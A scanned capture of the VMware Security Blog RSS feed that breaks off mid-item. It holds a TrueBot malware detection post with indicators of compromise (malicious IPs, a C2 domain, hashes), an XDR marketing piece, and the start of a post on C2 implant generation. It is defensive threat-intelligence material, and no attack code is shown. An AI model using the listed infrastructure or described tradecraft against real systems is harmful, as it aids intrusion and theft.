feeds.feedburner.com Open in urlscan Pro
2404:6800:4017:804::200e  Public Scan

URL: http://feeds.feedburner.com/VmwareSecurityComplianceBlog
Submission: On June 15 via manual from SG — Scanned from SG

Form analysis 0 forms found in the DOM

Text Content

VMware Security Blog https://blogs.vmware.com/security Mon, 05 Jun 2023 15:58:31
+0000 en-US hourly 1 https://wordpress.org/?v=6.1.1 Carbon Black’s TrueBot
Detection
https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html?utm_source=rss&utm_medium=rss&utm_campaign=carbon-blacks-truebot-detection
Thu, 01 Jun 2023 18:34:42 +0000 https://blogs.vmware.com/security/?p=83485 Going
from E to X in Detection & Response
https://blogs.vmware.com/security/2023/05/going-from-e-to-x-in-detection-response.html?utm_source=rss&utm_medium=rss&utm_campaign=going-from-e-to-x-in-detection-response
Thu, 04 May 2023 19:36:51 +0000 https://blogs.vmware.com/security/?p=83474 It’s
Raining Implants: How to Generate C2 Framework Implants At Scale
https://blogs.vmware.com/security/2023/04/its-raining-implants-how-to-generate-c2-framework-implants-at-scale.html?utm_source=rss&utm_medium=rss&utm_campaign=its-raining-implants-how-to-generate-c2-framework-implants-at-scale
Thu, 27 Apr 2023 15:00:49 +0000 https://blogs.vmware.com/security/?p=83464
VMware Response to CVE-2023-29552 – Reflective Denial-of-Service (DoS)
Amplification Vulnerability in SLP
https://blogs.vmware.com/security/2023/04/vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp.html?utm_source=rss&utm_medium=rss&utm_campaign=vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp
Tue, 25 Apr 2023 14:08:33 +0000 https://blogs.vmware.com/security/?p=83452 Bring
Your Own Backdoor: How Vulnerable Drivers Let Hackers In
https://blogs.vmware.com/security/2023/04/bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in.html?utm_source=rss&utm_medium=rss&utm_campaign=bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in
Wed, 19 Apr 2023 17:56:42 +0000 https://blogs.vmware.com/security/?p=83445 XDR:
Identity Matters – Who You Know is As Important as What You Know
https://blogs.vmware.com/security/2023/04/xdr-identity-matters-who-you-know-is-as-important-as-what-you-know.html?utm_source=rss&utm_medium=rss&utm_campaign=xdr-identity-matters-who-you-know-is-as-important-as-what-you-know
Tue, 18 Apr 2023 15:00:02 +0000 https://blogs.vmware.com/security/?p=83441
Investigating 3CX Desktop Application Attacks: What You Need to Know
https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html?utm_source=rss&utm_medium=rss&utm_campaign=investigating-3cx-desktop-application-attacks-what-you-need-to-know
Fri, 31 Mar 2023 16:59:31 +0000 https://blogs.vmware.com/security/?p=83435
Embedded vSphere Harbor default enablement results in an insecure configuration
https://blogs.vmware.com/security/2023/03/embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration.html?utm_source=rss&utm_medium=rss&utm_campaign=embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration
Fri, 31 Mar 2023 05:23:42 +0000 https://blogs.vmware.com/security/?p=83429 How
to Detect PoshC2 PowerShell Implants
https://blogs.vmware.com/security/2023/03/how-to-detect-poshc2-powershell-implants.html?utm_source=rss&utm_medium=rss&utm_campaign=how-to-detect-poshc2-powershell-implants
Fri, 24 Mar 2023 21:03:01 +0000 https://blogs.vmware.com/security/?p=83405
Unveiling the Evolution of Royal Ransomware
https://blogs.vmware.com/security/2023/03/unveiling-the-evolution-of-royal-ransomware.html?utm_source=rss&utm_medium=rss&utm_campaign=unveiling-the-evolution-of-royal-ransomware
Thu, 16 Mar 2023 20:11:57 +0000 https://blogs.vmware.com/security/?p=83390
This XML file does not appear to have any style information associated with it.
The document tree is shown below.

<rss xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/" version="2.0">
<channel>
<title>VMware Security Blog</title>
<atom:link href="https://blogs.vmware.com/security/feed" rel="self"
type="application/rss+xml"/>
<link>https://blogs.vmware.com/security</link>
<description/>
<lastBuildDate>Mon, 05 Jun 2023 15:58:31 +0000</lastBuildDate>
<language>en-US</language>
<sy:updatePeriod> hourly </sy:updatePeriod>
<sy:updateFrequency> 1 </sy:updateFrequency>
<generator>https://wordpress.org/?v=6.1.1</generator>
<item>
<title>Carbon Black’s TrueBot Detection</title>
<link>https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html?utm_source=rss&utm_medium=rss&utm_campaign=carbon-blacks-truebot-detection</link>
<dc:creator>
<![CDATA[ Fae Carlisle ]]>
...
</dc:creator>
<pubDate>Thu, 01 Jun 2023 18:34:42 +0000</pubDate>
<category>
<![CDATA[ Threat Analysis Unit ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83485</guid>
<description>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/03/Malware_Featured-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Malware_Featured-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-1024x555.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-768x416.png
768w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-1536x832.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-410x222.png
410w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-600x325.png
600w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-415x225.png
415w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-585x318.png
585w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-380x207.png
380w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-222x120.png
222w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured.png
1710w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>VMware’s Carbon Black
Managed Detection and Response (MDR) team began seeing a surge of TrueBot
activity in May 2023. TrueBot, otherwise known as Silence.Downloader has been
seen since at least 2017. TrueBot is under active development by Silence, with
recent versions using a Netwrix vulnerability for delivery. In this article, we
will break down what &#8230; <a
href="https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html">Carbon
Black’s TrueBot Detection</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/03/Malware_Featured-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Malware_Featured-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-1024x555.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-768x416.png
768w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-1536x832.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-410x222.png
410w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-600x325.png
600w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-415x225.png
415w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-585x318.png
585w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-380x207.png
380w,
https://blogs.vmware.com/security/files/2022/03/Malware_Featured-222x120.png
222w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured.png
1710w" sizes="(max-width: 300px) 100vw, 300px" /></div><p>VMware’s Carbon Black
Managed Detection and Response (MDR) team began seeing a surge of TrueBot
activity in May 2023. TrueBot, otherwise known as Silence.Downloader has been
seen since at least 2017. TrueBot is under active development by Silence, with
recent versions using a Netwrix vulnerability for delivery. In this article, we
will break down what we have seen in customers’ environments and how Carbon
Black MDR detects and responds to the threat.</p> <h2>History</h2> <p>Just as
its name suggests, TrueBot is a downloader trojan botnet that uses command and
control servers to collect information on compromised systems and uses that
compromised system as a launching point for further attacks, as seen recently
with Clop Ransomware.</p> <p>TrueBot was known for using malicious emails to
drop their malware but was recently seen using a Netwrix vulnerability as their
delivery method. VMware’s MDR team has seen this vulnerability used firsthand in
customer environments, as explored below. TrueBot is also using Raspberry Robin
(a worm) as a delivery vector.</p> <p>While Silence Group is known for targeting
banks and financial institutions, TrueBot has also been seen targeting the
education sector. In the Carbon Black Detection &amp; Notable Attacks section,
we break down the sectors that we have seen targeted from our platform.</p>
<h2>Attribution</h2> <p>Though a threat actor group called Silence Group is
attributed to this malware, Group-IB has linked the group with Russia’s EvilCorp
(Indrik Spider) due to the downloaders they use being similar. The MDR team has
explored this link and has not found substantial evidence to back this
claim.</p> <p>Researchers thought EvilCorp to be linked to TrueBot due to
TrueBot dropping FlawedGrace. FlawedGrace is malware that is attributed to
EvilCorp. Though TrueBot drops this payload, the malware operators could
purchase access to this tool directly from EvilCorp. Another link explored was
TrueBot dropping Clop Ransomware, which was previously used by EvilCorp.
However, Clop is ransomware-as-a-service, so anyone can purchase access to this
tool. Lastly, Silence is a Russian-speaking cybercriminal group that uses
Russian web hosting services. Though EvilCorp is also Russian, this is not
strong evidence to link the two, as there are dozens of Russian APTs.</p> <p>Due
to these findings, we cannot say for sure whether EvilCorp and TrueBot are
connected.</p> <h2>Carbon Black Detection</h2> <p>Carbon Black is very effective
at detecting TrueBot and its associated activity. This section will focus on
what Carbon Black detected and the visibility into the attack process.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83489"
src="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-1024x137.png"
alt="" width="900" height="120"
srcset="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-1024x137.png
1024w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-300x40.png
300w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-768x102.png
768w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-1536x205.png
1536w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-600x80.png
600w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM.png
1920w" sizes="(max-width: 900px) 100vw, 900px" /></a></p> <p><em>Figure 1.1
Process Chain</em></p> <p>The infection appeared to have started with a
drive-by-download from Chrome for the executable ‘update.exe’.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83488"
src="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM-1024x253.png"
alt="" width="800" height="198"
srcset="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM-1024x253.png
1024w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM-300x74.png
300w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM-768x190.png
768w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM-600x148.png
600w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM.png
1132w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i>Figure 1.2
Update.exe being downloaded</i></p> <p>A user had to click on this in order to
execute the malware. Upon execution, the malware immediately begins to look for
EDR and antivirus software.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83487"
src="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM-1024x201.png"
alt="" width="800" height="157"
srcset="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM-1024x201.png
1024w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM-300x59.png
300w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM-768x151.png
768w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM-600x118.png
600w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM.png
1038w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i>Figure 1.3
Looking for EDR/AV</i></p> <p>Once executed, it connected to 94[.]142.138.61IP,
which is a Russian IP address that is known to be attributed to TrueBot. At the
address, the executable ‘3ujwy2rz7v.exe’ was downloaded and then launched by
cmd.exe.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83486"
src="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM-1024x351.png"
alt="" width="800" height="274"
srcset="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM-1024x351.png
1024w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM-300x103.png
300w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM-768x263.png
768w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM-600x206.png
600w,
https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM.png
1184w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i>Figure 1.4
3ujwy2rz7v.exe activity</i></p> <p>The executable then connected to the C2
domain name ‘dremmfyttrred[.]com’.</p> <p>The activity thereafter included dumps
of LSASS, exfiltration of data, and system and process enumerations.</p>
<p>Managed Detection and Response stops this activity through first the
detection of the activity and then the implementation of system quarantines,
hash banning, policy reviews, and policy modifications. Customers are informed
of the observed activity and actions taken by the team every step of the
way.</p> <h2>Indicators of Compromise</h2> <ul> <li
aria-level="1">45.182.189[.]103</li> <li aria-level="1">Dremmfyttrred.com</li>
<li aria-level="1">94.142.138[.]61</li> <li aria-level="1">Locations: Russia,
Panama</li> <li aria-level="1">Update.exe</li> <li
aria-level="1">Document_26_apr_2443807.exe</li> <li
aria-level="1">fe746402c74ac329231ae1b5dffa8229b509f4c15a0f5085617f14f0c1579040</li>
<li aria-level="1">172.64.155[.]188</li> <li aria-level="1">104.18.32[.]68</li>
<li aria-level="1">3ujwy2rz7v.exe</li> </ul> <h2>Summary</h2> <p>TrueBot can be
a particularly nasty infection for any network. When an organization is infected
with this malware, it can quickly escalate to become a bigger infection, similar
to how ransomware spreads throughout a network. Carbon Black is able to quickly
detect TrueBot and its associated activity and, with the help of MDR, be able to
detect and contain it early in the attack chain before the threat
escalates.</p><p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html">Carbon
Black’s TrueBot Detection</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>Going from E to X in Detection & Response</title>
<link>https://blogs.vmware.com/security/2023/05/going-from-e-to-x-in-detection-response.html?utm_source=rss&utm_medium=rss&utm_campaign=going-from-e-to-x-in-detection-response</link>
<dc:creator>
<![CDATA[ Simon Perry ]]>
...
</dc:creator>
<pubDate>Thu, 04 May 2023 19:36:51 +0000</pubDate>
<category>
<![CDATA[ Modern Apps Security ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83474</guid>
<description>
<![CDATA[ <div><img width="300" height="169"
src="https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-300x169.jpg"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-300x169.jpg
300w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-1024x576.jpg
1024w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-768x432.jpg
768w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-1536x864.jpg
1536w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-2048x1152.jpg
2048w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-600x338.jpg
600w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>The first SOC I toured
was that of a major US bank, circa 2000. That SOC, and the many others I’ve
stepped foot in since relied heavily on a SIEM to play the twin roles of
centralized data collection and correlation. Later SOAR platforms were developed
as richer and more capable automation engines, based on &#8230; <a
href="https://blogs.vmware.com/security/2023/05/going-from-e-to-x-in-detection-response.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/05/going-from-e-to-x-in-detection-response.html">Going
from E to X in Detection &#038; Response</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="169"
src="https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-300x169.jpg"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-300x169.jpg
300w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-1024x576.jpg
1024w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-768x432.jpg
768w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-1536x864.jpg
1536w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-2048x1152.jpg
2048w,
https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-600x338.jpg
600w" sizes="(max-width: 300px) 100vw, 300px" /></div><p><span
data-contrast="auto">The first SOC I toured was that of a major US bank, circa
2000. That SOC, and the many others I’ve stepped foot in since relied heavily on
a SIEM to play the twin roles of centralized data collection and correlation.
Later SOAR platforms were developed as richer and more capable automation
engines, based on the SIEM data set.</span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">However, being
log-driven SIEM/SOARs are wholly reliant on an upstream control (firewall, etc.)
reliably detecting anomalous activity and logging an event to the SIEM.
Attackers focus keenly on avoiding such detection. Visibility gaps are all too
common, and through those gaps and blind spots, attackers slip to steal,
disrupt, and destroy. It has become increasingly obvious that SIEMs are reliable
platforms for the sort of information called for by compliance requirements, but
are sadly lacking as a primary, front-line tool for threat detection and threat
hunting. </span><span data-ccp-props="{}"> </span></p> <h2>Enter EDR</h2>
<p><span data-contrast="auto">The only constant in security is change; attackers
research and employ new TTPs while defenders develop deeper skills, new
processes, and better tools. One such game-changing tool developed to provide
defenders with a far richer telemetry set than defenders ever enjoyed before was
EDR. Carbon Black invented and shipped to market the first commercial EDR even
before Gartner Analyst Anton Chuvakin “named” the market segment back in
2013</span><span data-contrast="auto">. EDR shone a light into the details of
what attackers were attempting to do on an endpoint and server, eliminating a
dangerous blind spot where 40% of attacks start and end.</span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">EDR’s place as a
foundation for the modern SOC is now almost universally recognized, and its
ability to gather and analyze detailed telemetry to detect anomalous behavior on
endpoints has been modeled and applied to the realms of the network and
identity. It is not unusual to find in more mature SOCs network detection
(typically standalone NDR and PCAP tools), and identity analysis (usually UEBA)
deployed alongside EDR (and the still ubiquitous SIEM/SOAR). </span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">The challenge
though for the typical SOC is twofold: firstly that until now capture and
analysis of network traffic typically required expensive hardware in the form of
packet brokers and network taps; and secondly the burden of bringing together
three different and disparate data sources (EDR, network, and identity) and
effectively using them to detect and respond to an attack early and accurately
fell on the shoulders of the SOC Analyst, leading to stress, burnout, and missed
signals.</span><span data-ccp-props="{}"> </span></p> <p><span
data-contrast="auto">Together endpoint, network, and identity telemetry provide
a powerful detective triad for SOC Analysts to use to find attacks, but
defenders need a better way than to rely on standalone EDR, NDR, and
UEBA. </span><span data-ccp-props="{}"> </span></p> <h2>Enter XDR<span
data-ccp-props="{}"><br /> </span></h2> <p><span data-contrast="auto">XDR
(E</span><span data-contrast="auto">x</span><span data-contrast="auto">tended
</span><span data-contrast="auto">D</span><span data-contrast="auto">etection
&amp; </span><span data-contrast="auto">R</span><span
data-contrast="auto">esponse) provides the means to combine endpoint, network,
and identity data. XDR is the logical next step from EDR and delivers enrichment
of captured data by mapping it to the MITRE ATT&amp;CK framework of TTPs and
adding appropriate meta-data tags, the correlation across the three data types,
and automatic response to an alert. XDR also provides a deep, broad, and
forensically useful data trail useful for root cause analysis of an
attack.</span><span data-ccp-props="{}"> </span></p> <p><span
data-contrast="auto">Like any new tool introduced by our industry, XDR is often
“different things to different people” and there remains some confusion as to
what XDR is and is not. Let’s clear that up.</span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">XDR does not
replace the SIEM/SOAR, which remains useful as a central data store for
compliance reporting and for some forensic activities. Organizations have
typically invested significant time, effort, and money in the operationalization
of SIEM and SOAR. It is unreasonable to expect that they will rip and replace
the SIEM and SOAR to achieve XDR.  </span><span data-ccp-props="{}"> </span></p>
<p><span data-contrast="auto">Nor should XDR require the addition of yet more
disparate tools. A shocking statistic is that on average a typical organization
has 47 security tools deployed, and 70% have added five tools in the last twelve
months. Considering that trend it ought not be surprising that 95% of attacks
involve a vulnerability or blind spot available to the attacker to exploit due
to misconfiguration and misalignment between the many controls </span><span
data-contrast="auto">2</span><span data-contrast="auto">. Further, I would argue
that anyone new security control needs to replace two or more existing controls;
we need to simplify and improve the SOC Analyst experience, not add to the
confusion and the management burden.</span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">In delivering
</span><a
href="https://carbonblack.vmware.com/carbon-black-xdr-activity-path"><span
data-contrast="auto">VMware </span><span data-contrast="none">Carbon Black
XDR</span></a><span data-contrast="auto"> to market we have built on our legacy
as a pioneer in EDR. Carbon Black XDR transforms a fleet of endpoints into a
distributed mesh of network sensors, each collecting endpoint, network, and
identity telemetry, streaming that to the Carbon Black Cloud where we natively
correlate, enrich, and analyze these three data sources. All without network
configuration changes, without the need for expensive network taps and packet
brokers, both of which are architecturally unsuited for the post-COVID,
distributed workforce, and multi-cloud world we now live in. </span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">Carbon Black XDR
provides the SOC Analyst more visibility. Our approach to XDR adds network and
identity telemetry to the existing EDR data, providing the means to identify
hidden &amp; highly sophisticated attacks. Carbon Black XDR speeds Mean Time To
Detect and Respond (MTTD/MTTR) and allows the SOC to better track and understand
attacks that target multiple systems. Importantly, Carbon Black XDR is by design
an open ecosystem; integrating with and adding value to the existing SIEM and
SOAR, and follows a design philosophy that there will be third-party tools and
additional data sources that will further extend XDR. </span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">In summary; XDR
builds on and is a natural and logical extension to EDR. It neither replaces
SIEM/SOAR nor should require you to add yet more disparate tools. In fact, the
idea of relying on hardware tap-based approaches to capturing network traffic
just doesn’t work today, given our approach to production workload architecture
and to the way end users connect from anywhere. </span><span
data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">You may hear
varying definitions of XDR over the coming months as this industry sector gains
prominence. To cut through all that just keep asking the same two questions:
“Will I be required to add more complexity and burden to my SOC by adding more
tools?”;  and “Am I being asked to rip and replace trusted tools that I have
already invested so much in?”. </span><span data-ccp-props="{}"> </span></p>
<p><span data-contrast="auto">Improving the SOC Analyst experience requires an
evolution from EDR to XDR, but at VMware Carbon Black we don’t believe it should
require a change to everything you do.</span><span
data-ccp-props="{}"> </span></p><p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/05/going-from-e-to-x-in-detection-response.html">Going
from E to X in Detection &#038; Response</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>It’s Raining Implants: How to Generate C2 Framework Implants At
Scale</title>
<link>https://blogs.vmware.com/security/2023/04/its-raining-implants-how-to-generate-c2-framework-implants-at-scale.html?utm_source=rss&utm_medium=rss&utm_campaign=its-raining-implants-how-to-generate-c2-framework-implants-at-scale</link>
<dc:creator>
<![CDATA[ Sebastiano Mariani ]]>
...
</dc:creator>
<pubDate>Thu, 27 Apr 2023 15:00:49 +0000</pubDate>
<category>
<![CDATA[ Threat Analysis Unit ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83464</guid>
<description>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png
410w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>Command-and-control
(C2) frameworks serve as a means to remotely manage and access compromised
devices. They allow for the creation of various payload types, called implants,
that are dropped on victim machines by attackers, enabling them to retain access
and control over the infected victim.  While legitimate penetration testing
utilizes C2 frameworks to evaluate system security &#8230; <a
href="https://blogs.vmware.com/security/2023/04/its-raining-implants-how-to-generate-c2-framework-implants-at-scale.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/04/its-raining-implants-how-to-generate-c2-framework-implants-at-scale.html">It’s
Raining Implants: How to Generate C2 Framework Implants At Scale</a> appeared
first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware
Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/20 ]]>
<![CDATA[ 22/05/Threat-Analysis-Unit_410x222-300x162.png 300w,
https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png
410w" sizes="(max-width: 300px) 100vw, 300px" /></div><p><span
data-contrast="none">Command-and-control (C2) frameworks serve as a means to
remotely manage and access ]]>
<![CDATA[ compromised devices. They allow for the creation of various payload
types, called implants, that are dropped on victim machines by attackers,
enabling them to retain access and control over the infected victim.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335 ]]>
<![CDATA[ 559740&quot;:259}"> </span></p> <p><span data-contrast="none">While
legitimate penetration testing utilizes C2 frameworks to evaluate system
security and identify potential attacks, cyber-criminals have also taken
advantage of these tools for malicious purposes. The likes of Cobalt Strike,
Metasplo ]]>
<![CDATA[ it, and Brute Ratel have become increasingly popular in breaching
enterprise networks.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="none">For a better understanding of how C2 frameworks
operate, refer ]]>
<![CDATA[ to </span><span data-contrast="auto">Figure 1</span><span
data-contrast="none">, which presents a simplified scenario of a compromised
machine.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-ccp-props="{&quot;13 ]]>
<![CDATA[
4245418&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><a
href="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp ]]>
<![CDATA[ -image-83465"
src="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM-1024x891.png"
alt="" width="800" height="696"
srcset="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM-1024x891.png
1024w, https://blogs.vmware.com/security/fil ]]>
<![CDATA[ es/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM-300x261.png 300w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM-768x669.png
768w,
https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM-600x522.png
600w, https://blogs.vmware.com/sec ]]>
<![CDATA[ urity/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM.png 1220w"
sizes="(max-width: 800px) 100vw, 800px" /></a></span></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">1</span></i><i><span data-contrast="none">: How C2
frameworks operate.</span></i><span data-c ]]>
<![CDATA[
